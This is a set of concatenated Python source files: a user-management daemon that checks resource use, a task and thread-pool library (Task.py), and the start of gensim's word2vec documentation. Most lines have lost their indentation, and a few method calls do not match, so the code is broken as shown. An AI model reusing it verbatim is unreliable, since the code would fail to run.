            result['resource_contributor_violation'] = True
        if total_services > sharing_model['max_apps']:
            result['max_apps_violation'] = True
    except Exception:
        LOG.exception('[usermgnt.modules.assessment] [__check_resources_used] << Assessment Process >> check_resources_used >> Exception')
    return result  # an empty dict means no violations were found
# daemon process
def __daemon():
global execute
try:
while execute:
LOG.debug('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> executing ...')
device_id = None
user_id = None
# 1. get current profile
user_profile = data_adapter.get_current_user_profile()
if user_profile is None:
LOG.error('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile not found / error')
elif user_profile == -1:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile not found')
else:
user_id = user_profile['user_id']
device_id = user_profile['device_id']
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> user_profile found')
# 2. get current sharing model
sharing_model = data_adapter.get_current_sharing_model()
if sharing_model is None:
LOG.error('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model not found / error')
elif sharing_model == -1:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model not found')
else:
user_id = sharing_model['user_id']
device_id = sharing_model['device_id']
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> sharing_model found')
            if user_id is not None and device_id is not None:
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> checking values ...')
# 3. Get information:
# - battery
battery_level = data_adapter.get_power()
# battery_level = 50 # TODO
# - total services running
total_services = data_adapter.get_total_services_running()
# 4. check information and send warning to Lifecycle if needed
result = __check_resources_used(user_profile, sharing_model, battery_level, total_services)
if not result:
LOG.debug("[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> no violations: result: " + str(result))
else:
LOG.debug("[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> violations found: result: " + str(result))
LOG.log(TRACE, '[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> generating warning / sending notification ...')
mf2c.send_warning(user_id, device_id, user_profile, sharing_model, result)
else:
LOG.warning('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> cannot check values')
# wait 300 seconds
LOG.debug('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> Waiting 5m (300s) for next execution ...')
time.sleep(300)
    except Exception:
LOG.exception('[usermgnt.modules.assessment] [__daemon] << Assessment Process Thread >> Exception')
# start process
def start():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [start] << Assessment Process >> Starting assessment process [execute=" + str(execute) + "]")
if d is None:
LOG.debug("[usermgnt.modules.assessment] [start] << Assessment Process >> [d is None]")
d = threading.Thread(target=__daemon) #(name='daemon', target=daemon)
        d.daemon = True  # setDaemon() is deprecated; use the daemon attribute
execute = True
d.start()
return "started"
else:
LOG.warning("[usermgnt.modules.assessment] [start] << Assessment Process >> [execute: " + str(execute) + "; d.isAlive(): " + str(d.isAlive()) + "]")
return "???"
# stop process
def stop():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [stop] << Assessment Process >> Stopping assessment process [execute=" + str(execute) + "]")
if d is None:
        LOG.warning('[usermgnt.modules.assessment] [stop] << Assessment Process >> [execute: ' + str(execute) + '; d.is_alive(): None]')
return "???"
else:
LOG.debug('[usermgnt.modules.assessment] [stop] << Assessment Process >> [d.join()]')
execute = False
d.join()
d = None
return "Stopped"
# return status
def get_status():
global execute
global d
LOG.debug("[usermgnt.modules.assessment] [get_status] << Assessment Process >> Getting assessment process status [execute=" + str(execute) + "]")
if d is None:
return "Not initialized"
    elif execute and d.is_alive():
return "Running"
elif execute:
return "???"
else:
return "Stopped"
|
Task.py
|
#
# Task.py -- Basic command pattern and thread pool implementation.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from __future__ import absolute_import, print_function
from ..util import six
from ..util.six.moves import map
import sys
import time
import threading
import traceback
if six.PY2:
import thread
import Queue
else:
import _thread as thread
import queue as Queue
# NOTE: See http://bugs.python.org/issue7946
# we cannot effectively use threading for loading files/network/etc.
# without setting the switchinterval down on python 3 due to the new
# GIL implementation
_swival = 0.000001
sys.setswitchinterval(_swival)
from . import Callback # noqa
class TaskError(Exception):
"""Exception generated for task errors"""
pass
class TaskTimeout(TaskError):
"""Exception generated when timing out waiting on a task"""
pass
class UserTaskException(Exception):
pass
# ------------ BASIC TASKS ------------
class Task(Callback.Callbacks):
"""This class implements a basic Task (command) abstraction. The
methods define the interface for starting, cancelling, waiting on a
task, etc.
"""
def __init__(self):
"""
The constructor sets bare essentials for a Task object. See the
initialize() and start() methods.
"""
self.ev_done = threading.Event()
self.tag = None
self.logger = None
self.threadPool = None
# Lock for task state critical sections
self.tlock = threading.RLock()
# Parent task can set this (or add to it) explicitly to determine
# which values will be copied when it calls initialize() on a child
# task.
self.shares = ['logger', 'threadPool', 'shares']
super(Task, self).__init__()
self.enable_callback('resolved')
def initialize(self, taskParent, override=None):
"""This method initializes a task for (re)use. taskParent is the
object instance of the parent task, or a 'task environment' (something
that runs tasks).
If subclass overrides this method, it should call the superclass
method at some point.
- Copy shared data from taskParent, overriding items from _override_
if they are present there ('contagion' of task values).
- Generate a unique tag, to be used with the Gen2 Monitor.
- Clear done event, initialize times and result.
"""
# For now, punt if we have no apparent parent
if taskParent and hasattr(taskParent, 'shares'):
# Copy some variables from our parent task, unless they are being
# overridden explicitly. Using this general "contagion" mechanism,
            # a task can cause its children to have values available to them
# without passing them explicitly.
for var in taskParent.shares:
if override and var in override:
self.__dict__[var] = override[var]
else:
#print "COPYING VAR FROM PARENT: %s(%s)" % (var, str(taskParent.__dict__[var]))
self.__dict__[var] = taskParent.__dict__[var]
else:
#raise TaskError("Cannot initialize task without a taskParent!")
pass
# Generate our own unique tag. 'tagger' should have been transmitted
# from the parent task
if not self.tag:
try:
self.tag = str(taskParent) + '.' + self.tagger.get_tag(self)
except Exception:
# Failed--fall back to internal tagger
self.tag = get_tag(taskParent)
# Some per-task specific initialization
self.ev_done.clear()
self.starttime = time.time()
self.endtime = 0
self.totaltime = 0
self.result = None
return self.tag
def start(self):
"""This method starts a task executing and returns immediately.
Subclass should override this method, if it has an asynchronous
way to start the task and return immediately.
"""
if self.threadPool:
self.threadPool.addTask(self)
# Lets other threads have a chance to run
time.sleep(0)
else:
raise TaskError("start(): nothing to start for task %s" % self)
def init_and_start(self, taskParent, override={}):
"""Convenience method to initialize and start a task.
"""
tag = self.initialize(taskParent, override=override)
self.start()
return tag
def check_state(self):
"""Abstract method that should check for pause, cancellation, or
any other sort of preemption event.
"""
pass
def extend_shares(self, varlist):
shares = set(self.shares)
for var in varlist:
if hasattr(self, var):
shares.add(var)
self.shares = shares
def stop(self):
"""This method cancels an executing task (if possible).
Subclass should override this method.
Return True if task could be cancelled, False if not?
"""
raise TaskError("Task %s: subclass should override stop() method!" % (
self))
def pause(self):
"""This method pauses an executing task (if possible).
Subclass should override this method.
Return True if task could be paused, False if not?
"""
raise TaskError("Task %s: subclass should override pause() method!" % (
self))
def resume(self):
"""This method resumes an executing task (if possible).
Subclass should override this method, should not call super.resume().
Return True if task could be resumed, False if not?
"""
raise TaskError("Task %s: subclass should override resume() method!" % (
self))
def wait(self, timeout=None):
"""This method waits for an executing task to finish.
Subclass can override this method if necessary.
"""
self.ev_done.wait(timeout=timeout)
if not self.ev_done.is_set():
raise TaskTimeout("Task %s timed out." % self)
# --> self.result is set
# If it is an exception, then raise it in this waiter
if isinstance(self.result, Exception):
raise self.result
# Release waiters and perform callbacks
# done() has already been called, because of self.ev_done check
# "asynchronous" tasks should could call done() here
#self.done(self.result)
return self.result
def step(self):
"""If a task has a way of stepping through an operation. It can
implement this method. Subclass should not call super.step().
"""
raise TaskError("Task %s: subclass should override step() method!" %
self)
def execute(self):
"""This method does the work of a task (if executed by the
thread pool) and returns when it is finished. *** Subclass should
override this method! *** It should take no arguments, and can
return anything.
"""
raise TaskError("Task %s: subclass should override execute() method!" %
self)
def done(self, result, noraise=False):
"""This method is called when a task has finished executing.
Subclass can override this method if desired, but should call
superclass method at the end.
"""
# [??] Should this be in a critical section?
# Has done() already been called on this task?
if self.ev_done.is_set():
# ??
if isinstance(self.result, Exception) and (not noraise):
raise self.result
return self.result
# calculate running time and other finalization
self.endtime = time.time()
try:
self.totaltime = self.endtime - self.starttime
except AttributeError:
# task was not initialized properly
self.totaltime = 0.0
self.result = result
# Release thread waiters
self.ev_done.set()
# Perform callbacks for event-style waiters
self.make_callback('resolved', self.result)
# If the result is an exception, then our final act is to raise
        # it in the caller, unless the caller explicitly suppressed that
if isinstance(result, Exception) and (not noraise):
raise result
return result
def get_tag(self):
"""This is only valid AFTER initialize() has been called on the task.
"""
return self.tag
def __str__(self):
"""Returns a string representation of a task (e.g. for debugging).
Subclass can override this method if desired.
"""
return str(self.tag)
def __lt__(self, other):
return False
def getExecutionTime(self):
return self.totaltime
def runTask(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task.
"""
# Initialize the task.
task.initialize(self)
# Start the task.
task.start()
# Lets other threads run
time.sleep(0)
# Wait for it to finish.
res = task.wait(timeout=timeout)
# Now we're done
return res
def run(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task. Simply calls runTask().
"""
return self.runTask(task, timeout=timeout)
# For testing...
class printTask(Task):
"""Simple task that prints msg."""
def __init__(self, msg):
self.msg = msg
super(printTask, self).__init__()
def execute(self):
print(self.msg)
class sleepTask(Task):
"""Simple task that sleeps for delay seconds."""
def __init__(self, delay):
self.delay = delay
super(sleepTask, self).__init__()
def execute(self):
self.ev_done.wait(timeout=self.delay)
class FuncTask(Task):
"""Simple task that calls func and returns func's return value."""
def __init__(self, func, args, kwdargs, logger=None):
self.func = func
self.args = args
self.kwdargs = kwdargs
self.logger = logger
super(FuncTask, self).__init__()
def execute(self):
if self.logger:
# Cap logging size around 500 characters
s_args = str(self.args)
if len(s_args) > 500:
s_args = s_args[:500]
s_kwdargs = str(self.kwdargs)
if len(s_kwdargs) > 500:
s_kwdargs = s_kwdargs[:500]
self.logger.debug("Running %s(%s, %s)" % (
self.func.__name__, s_args, s_kwdargs))
s_args = None
s_kwdargs = None
try:
res = self.func(*self.args, **self.kwdargs)
self.done(res)
if self.logger:
self.logger.debug("Function returned %s" % (
str(res)))
except Exception as e:
if self.logger:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(self), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.error("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
tb = None
except Exception:
self.logger.error("Traceback information unavailable.")
self.done(e)
class FuncTask2(FuncTask):
"""Simple task that calls func and returns func's return value.
This version lets you specify the positional and keyword arguments
more naturally 'in place' in the constructor.
"""
def __init__(self, func, *args, **kwdargs):
super(FuncTask2, self).__init__(func, args, kwdargs)
def set_logger(self, logger):
self.logger = logger
def make_tasker(func):
"""make_tasker takes a callable (function, method, etc.) and returns
a new factory function for generating tasks. Each factory function is
designed to consume its arguments and return a task that, when executed,
will call the function upon the arguments.
TODO: deprecate this and just use FuncTask, which is easier to
understand--must change a number of programs first.
"""
def anonFunc(*args, **kwdargs):
class anonTask(Task):
def execute(self):
self.logger.debug("Executing fn %s" % func)
try:
val = func(*args, **kwdargs)
self.logger.debug("Done executing fn %s" % func)
return val
except Exception as e:
# Log error message and re-raise exception.
self.logger.error("fn %s raised exception: %s" % (
func, str(e)))
raise e
return anonTask()
return anonFunc
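

# Illustrative usage sketch (assumes `parent` is a task or 'task environment'
# whose `shares` provide a logger and threadPool; see Task.initialize above):
def _example_make_tasker_usage(parent):
    say_hello = make_tasker(print)           # factory wrapping print()
    task = say_hello("hello from a task")    # one concrete anonTask instance
    return task.init_and_start(parent)       # queue it on the shared thread pool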
# ------------ COMPOUND TASKS ------------
class SequentialTaskset(Task):
"""Compound task that runs a series of tasks sequentially.
"""
def __init__(self, taskseq):
super(SequentialTaskset, self).__init__()
self.tasklist = list(taskseq)
def initialize(self, taskParent, **kwdargs):
self.index = 0
super(SequentialTaskset, self).initialize(taskParent, **kwdargs)
def step(self):
"""Run the next child task and wait for completion (no timeout)."""
if self.index >= len(self.tasklist):
raise TaskError("step(): sequential compound task %s finished" % self)
self.check_state()
# Select next task from the set and advance the index
self.task = self.tasklist[self.index]
self.index += 1
return self.runTask(self.task)
def execute(self):
"""Run all child tasks, in order, waiting for completion of each.
Return the result of the final child task's execution.
"""
while self.index < len(self.tasklist):
res = self.step()
self.logger.debug('SeqSet task %i has completed with result %s' %
(self.index, res))
# Returns result of last task to quit
return res
def stop(self):
"""Interrupt/cancel execution, but will allow current child task
to complete."""
#self.ev_intr.set()
try:
self.task.stop()
except TaskError as e:
self.logger.error("Error cancelling child task: %s" % (str(e)))
def addTask(self, task):
"""Append a task to the task sequence. If the SequentialTaskset has
already completed execution, this will do nothing unless it is
restarted (initialize(), start()).
"""
self.tasklist.append(task)
class oldConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(oldConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
self.ev_intr = threading.Event()
# Used to synchronize compound task termination
self.regcond = threading.Condition()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return 0 after all child tasks have completed execution.
"""
self.count = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Register termination callbacks for all my child tasks.
for task in list(self.taskseq):
self.taskset.append(task)
task.add_callback('resolved', self.child_done, self.count)
self.count += 1
self.numtasks = self.count
# Now start each child task.
with self.regcond:
for task in list(self.taskset):
task.initialize(self)
task.start()
# Account for time needed to start subtasks
self.totaltime = time.time() - self.totaltime
# Now give up the critical section and wait for last child
# task to terminate.
while self.count > 0:
self.regcond.wait()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
return 0
def child_done(self, task, result, count):
"""Acquire the condition variable for the compound task object.
Decrement the thread count. If we are the last thread to
finish, release compound task thread, which is blocked in execute().
"""
with self.regcond:
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.count -= 1
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(count, task)] = result
if self.count <= 0:
                self.regcond.notify_all()
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
def addTask(self, task):
"""Add a task to the task set.
"""
with self.regcond:
self.taskset.append(task)
task.add_callback('resolved', self.child_done, self.numtasks)
self.numtasks += 1
self.count += 1
task.initialize(self)
task.start()
class newConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(newConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
# tuning value for polling inefficiency
self.idletime = 0.001
# internal mutex
self._lock_c = threading.RLock()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return last result after all child tasks have completed execution.
"""
with self._lock_c:
self.count = 0
self.numtasks = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Start all tasks
for task in self.taskseq:
self.taskset.append(task)
self.numtasks += 1
task.init_and_start(self)
num_tasks = self.getNumTasks()
# Wait on each task to clean up results
while num_tasks > 0:
self.check_state()
for i in range(num_tasks):
try:
try:
task = self.getTask(i)
except IndexError:
# A task got deleted from the set. Jump back out
# to outer loop and repoll the number of tasks
break
#self.logger.debug("waiting on %s" % task)
res = task.wait(timeout=self.idletime)
#self.logger.debug("finished: %s" % task)
self.child_done(res, task)
except TaskTimeout:
continue
except Exception as e:
#self.logger.warning("Subtask propagated exception: %s" % str(e))
self.child_done(e, task)
continue
# wait a bit and try again
#self.ev_quit.wait(self.idletime)
# re-get number of tasks, in case some were added or deleted
num_tasks = self.getNumTasks()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
# Return value of last child to complete
return value
def child_done(self, result, task):
with self._lock_c:
self.count += 1
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(self.count, task)] = result
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
with self._lock_c:
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
# stop ourself
#self.ev_intr.set()
def addTask(self, task):
"""Add a task to the task set.
"""
# Try to start task first. If it fails then we don't need to
# undo adding it to taskset
task.initialize(self)
task.start()
with self._lock_c:
self.numtasks += 1
self.taskset.append(task)
def getTask(self, i):
with self._lock_c:
return self.taskset[i]
def getNumTasks(self):
"""Get the set of active tasks.
"""
with self._lock_c:
return len(self.taskset)
class ConcurrentAndTaskset(newConcurrentAndTaskset):
pass
class QueueTaskset(Task):
"""Compound task that runs a set of tasks that it reads from a queue
concurrently. If _waitflag_ is True, then it will run each task to
completion before starting the next task.
"""
def __init__(self, queue, waitflag=True, timeout=0.1, ev_quit=None):
super(QueueTaskset, self).__init__()
self.queue = queue
self.waitflag = waitflag
self.lock = threading.RLock()
self.timeout = timeout
self.task = None
self.ev_cancel = threading.Event()
self.ev_pause = threading.Event()
if ev_quit is None:
ev_quit = threading.Event()
self.ev_quit = ev_quit
def flush(self):
# Flush queue of pending tasks
self.logger.debug("Flushing queue.")
while True:
try:
self.queue.get(block=False)
except Queue.Empty:
break
def stop(self):
self.flush()
#self.ev_intr.set()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
# put termination sentinel
self.queue.put(None)
def stop_child(self):
self.flush()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
def execute(self):
self.count = 0
self.totaltime = 0
self.logger.debug("Queue Taskset starting")
while not self.ev_quit.is_set():
try:
self.check_state()
task = self.queue.get(block=True, timeout=self.timeout)
if task is None:
# termination sentinel
break
self.task = task
                task.add_callback('resolved', self.child_done)
with self.lock:
self.count += 1
self.ev_cancel.clear()
try:
task.initialize(self)
self.logger.debug("Starting task '%s'" % str(task))
task.start()
if self.waitflag:
res = task.wait()
self.logger.debug("Task %s terminated with result %s" % (
(str(task), str(res))))
except Exception as e:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(task), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
# If task raised exception then it didn't call done,
task.done(e, noraise=True)
except Queue.Empty:
# No task available. Continue trying to get one.
continue
# TODO: should we wait for self.count > 0?
self.logger.debug("Queue Taskset terminating")
return self.result
def child_done(self, task, result):
with self.lock:
self.count -= 1
self.totaltime += task.getExecutionTime()
self.result = result
def cancel(self):
self.flush()
super(QueueTaskset, self).cancel()
def addTask(self, task):
self.queue.put(task)
# ------------ PRIORITY QUEUES ------------
class PriorityQueue(Queue.PriorityQueue):
pass
# ------------ WORKER THREADS ------------
class _WorkerReset(Exception):
"""Local exception used to reset a worker thread."""
pass
class WorkerThread(object):
"""Container for a thread in which to call the execute() method of a task.
A WorkerThread object waits on the task queue, executes a task when it
appears, and repeats. A call to start() is necessary to start servicing
the queue, and a call to stop() will terminate the service.
"""
def __init__(self, queue, logger=None, ev_quit=None,
timeout=0.2, tpool=None):
self.queue = queue
self.logger = logger
self.timeout = timeout
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.tpool = tpool
self.lock = threading.RLock()
self.status = 'stopped'
self.time_start = 0.0
def setstatus(self, status):
"""Sets our status field so that others can inquire what we are doing.
        Possible statuses include:
        starting, idle, executing <task>, cleaning <task>, stopped
"""
with self.lock:
self.status = status
def getstatus(self):
"""Returns our status--a string describing what we are doing.
"""
with self.lock:
return (self.status, self.time_start)
def execute(self, task):
"""Execute a task.
"""
taskid = str(task)
res = None
try:
# Try to run the task. If we catch an exception, then
# it becomes the result.
self.time_start = time.time()
self.setstatus('executing %s' % taskid)
self.logger.debug("now executing task '%s'" % taskid)
try:
res = task.execute()
except UserTaskException as e:
res = e
except Exception as e:
self.logger.error("Task '%s' raised exception: %s" %
(str(task), str(e)))
res = e
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
finally:
self.logger.debug("done executing task '%s'" % str(task))
self.setstatus('cleaning %s' % taskid)
# Wake up waiters on other threads
task.done(res, noraise=True)
self.time_start = 0.0
self.setstatus('idle')
# Basic task execution loop. Dequeue a task and run it, then look
# for another one
def taskloop(self):
self.setstatus('starting')
self.logger.debug('Starting worker thread loop.')
# If we were handed a thread pool upon startup, then register
# ourselves with it.
if self.tpool:
self.tpool.register_up()
try:
self.setstatus('idle')
while not self.ev_quit.is_set():
try:
# Wait on our queue for a task; will timeout in
# self.timeout secs
(priority, task) = self.queue.get(block=True,
timeout=self.timeout)
if task is None:
# termination sentinel
self.queue.put((priority, task))
break
self.execute(task)
except _WorkerReset:
self.logger.info("Worker reset!")
except Queue.Empty as e:
# Reach here when we time out waiting for a task
pass
finally:
self.logger.debug('Stopping worker thread loop.')
if self.tpool:
self.tpool.register_dn()
self.setstatus('stopped')
def start(self):
self.thread = threading.Thread(target=self.taskloop, args=[])
self.thread.start()
def stop(self):
        # Put termination sentinel on queue
self.queue.put((0, None))
self.ev_quit.set()
# ------------ THREAD POOL ------------
class ThreadPool(object):
"""A simple thread pool for executing tasks asynchronously.
self.status states:
        down   no threads are ready for service
        up     all threads are ready for service
        start  threads are starting, but not all of them are up yet
        stop   threads are stopping, but not all of them are down yet
"""
def __init__(self, numthreads=1, logger=None, ev_quit=None,
workerClass=WorkerThread):
self.numthreads = numthreads
self.logger = logger
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.lock = threading.RLock()
self.workerClass = workerClass
self.queue = PriorityQueue()
self.workers = []
self.tids = []
# Used to synchronize thread pool startup (see register() method)
self.regcond = threading.Condition()
self.runningcount = 0
self.status = 'down'
def startall(self, wait=False, **kwdargs):
"""Start all of the threads in the thread pool. If _wait_ is True
then don't return until all threads are up and running. Any extra
keyword arguments are passed to the worker thread constructor.
"""
self.logger.debug("startall called")
with self.regcond:
while self.status != 'down':
if self.status in ('start', 'up') or self.ev_quit.is_set():
# For now, abandon additional request to start
self.logger.error("ignoring duplicate request to start thread pool")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'down')
if self.ev_quit.is_set():
return
self.runningcount = 0
self.status = 'start'
self.workers = []
if wait:
tpool = self
else:
tpool = None
# Start all worker threads
self.logger.debug("starting threads in thread pool")
for i in range(self.numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=tpool,
**kwdargs)
self.workers.append(t)
t.start()
# if started with wait=True, then expect that threads will register
# themselves and last one up will set status to "up"
if wait:
# Threads are on the way up. Wait until last one starts.
while self.status != 'up' and not self.ev_quit.is_set():
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
else:
# otherwise, we just assume the pool is up
self.status = 'up'
self.logger.debug("startall done")
def addThreads(self, numthreads, **kwdargs):
with self.regcond:
# Start all worker threads
self.logger.debug("adding %d threads to thread pool" % (
numthreads))
for i in range(numthreads):
t = self.workerClass(self.queue, logger=self.logger,
                                     ev_quit=self.ev_quit, tpool=self,
**kwdargs)
self.workers.append(t)
t.start()
self.numthreads += numthreads
def stopall(self, wait=False):
"""Stop all threads in the worker pool. If _wait_ is True
then don't return until all threads are down.
"""
self.logger.debug("stopall called")
with self.regcond:
while self.status != 'up':
if self.status in ('stop', 'down') or self.ev_quit.is_set():
# For now, silently abandon additional request to stop
self.logger.warning("ignoring duplicate request to stop thread pool.")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'up')
self.logger.debug("stopping threads in thread pool")
self.status = 'stop'
# Signal to all threads to terminate.
self.ev_quit.set()
if wait:
# Threads are on the way down. Wait until last one quits.
while self.status != 'down':
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
self.logger.debug("stopall done")
def workerStatus(self):
return list(map(lambda t: t.getstatus(), self.workers))
def addTask(self, task, priority=0):
"""Add a task to the queue of tasks.
The task will be executed in a worker thread as soon as one is available.
        Tasks with a lower priority value are executed first; tasks of equal
        priority are executed roughly in the order they were added.
"""
self.queue.put((priority, task))
def delTask(self, taskid):
self.logger.error("delTask not yet implemented")
def purgeTasks(self):
self.logger.error("purgeTasks not yet implemented")
def register_up(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Increment the running-thread count. If we are the last thread to
start, set status to 'up'. This allows startall() to complete
if it was called with wait=True.
"""
with self.regcond:
self.runningcount += 1
tid = thread.get_ident()
self.tids.append(tid)
self.logger.debug("register_up: (%d) count is %d" %
(tid, self.runningcount))
if self.runningcount == self.numthreads:
self.status = 'up'
self.regcond.notify()
def register_dn(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
        Decrement the running-thread count. If we are the last thread to
        quit, set status to 'down'. This allows stopall() to complete
        if it was called with wait=True.
"""
with self.regcond:
self.runningcount -= 1
tid = thread.get_ident()
self.tids.remove(tid)
self.logger.debug("register_dn: count_dn is %d" % self.runningcount)
self.logger.debug("register_dn: remaining: %s" % str(self.tids))
if self.runningcount == 0:
self.status = 'down'
self.regcond.notify()
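

# Illustrative usage sketch (not part of the original module): start a small
# pool, run one FuncTask2 through it via a bare-bones "task environment", and
# shut the pool down.  The _Example* names and the 5-second timeout are
# assumptions for the sketch only.
def _example_threadpool_usage(logger):
    class _ExampleEnv(object):
        """Minimal parent object sharing a logger and threadPool with tasks."""
        def __init__(self, logger, threadPool):
            self.logger = logger
            self.threadPool = threadPool
            self.shares = ['logger', 'threadPool', 'shares']

    pool = ThreadPool(numthreads=2, logger=logger)
    pool.startall(wait=True)
    try:
        env = _ExampleEnv(logger, pool)
        task = FuncTask2(sum, [1, 2, 3])
        task.init_and_start(env)          # queued on the pool's PriorityQueue
        result = task.wait(timeout=5.0)   # -> 6
    finally:
        pool.stopall(wait=True)
    return result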
# ------------ SUPPORT FUNCTIONS ------------
_lock_seqnum = threading.Lock()
_count_seqnum = 0
def get_tag(taskParent):
global _count_seqnum
with _lock_seqnum:
generic_id = 'task%d' % (_count_seqnum)
_count_seqnum += 1
if taskParent:
tag = str(taskParent) + '.' + generic_id
else:
tag = generic_id
return tag
# END
|
word2vec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: Gensim Contributors
# Copyright (C) 2018 RaRe Technologies s.r.o.
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Introduction
============
This module implements the word2vec family of algorithms, using highly optimized C routines,
data streaming and Pythonic interfaces.
The word2vec algorithms include skip-gram and CBOW models, using either
hierarchical softmax or negative sampling: `Tomas Mikolov et al: Efficient Estimation of Word Representations
in Vector Space <https://arxiv.org/pdf/1301.3781.pdf>`_, `Tomas Mikolov et al: Distributed Representations of Words
and Phrases and their Compositionality <https://arxiv.org/abs/1310.4546>`_.
Other embeddings
================
There are more ways to train word vectors in Gensim than just Word2Vec.
See also :class:`~gensim.models.doc2vec.Doc2Vec`, :class:`~gensim.models.fasttext.FastText`.
The training algorithms were originally ported from the C package https://code.google.com/p/word2vec/
and extended with additional functionality and
`optimizations <https://rare-technologies.com/parallelizing-word2vec-in-python/>`_ over the years.
For a tutorial on Gensim word2vec, with an interactive web app trained on GoogleNews,
visit https://rare-technologies.com/word2vec-tutorial/.
Usage examples
==============
Initialize a model with e.g.:
.. sourcecode:: pycon
>>> from gensim.test.utils import common_texts
>>> from gensim.models import Word2Vec
>>>
>>> model = Word2Vec(sentences=common_texts, vector_size=100, window=5, min_count=1, workers=4)
>>> model.save("word2vec.model")
**The training is streamed, so ``sentences`` can be an iterable**, reading input data
from the disk or network on-the-fly, without loading your entire corpus into RAM.
Note the ``sentences`` iterable must be *restartable* (not just a generator), to allow the algorithm
to stream over your dataset multiple times. For some examples of streamed iterables,
see :class:`~gensim.models.word2vec.BrownCorpus`,
:class:`~gensim.models.word2vec.Text8Corpus` or :class:`~gensim.models.word2vec.LineSentence`.
If you save the model you can continue training it later:
.. sourcecode:: pycon
>>> model = Word2Vec.load("word2vec.model")
>>> model.train([["hello", "world"]], total_examples=1, epochs=1)
(0, 2)
The trained word vectors are stored in a :class:`~gensim.models.keyedvectors.KeyedVectors` instance, as `model.wv`:
.. sourcecode:: pycon
>>> vector = model.wv['computer'] # get numpy vector of a word
>>> sims = model.wv.most_similar('computer', topn=10) # get other similar words
The reason for separating the trained vectors into `KeyedVectors` is that if you don't
need the full model state any more (don't need to continue training), its state can be discarded,
keeping just the vectors and their keys proper.
This results in a much smaller and faster object that can be mmapped for lightning
fast loading and sharing the vectors in RAM between processes:
.. sourcecode:: pycon
>>> from gensim.models import KeyedVectors
>>>
>>> # Store just the words + their trained embeddings.
>>> word_vectors = model.wv
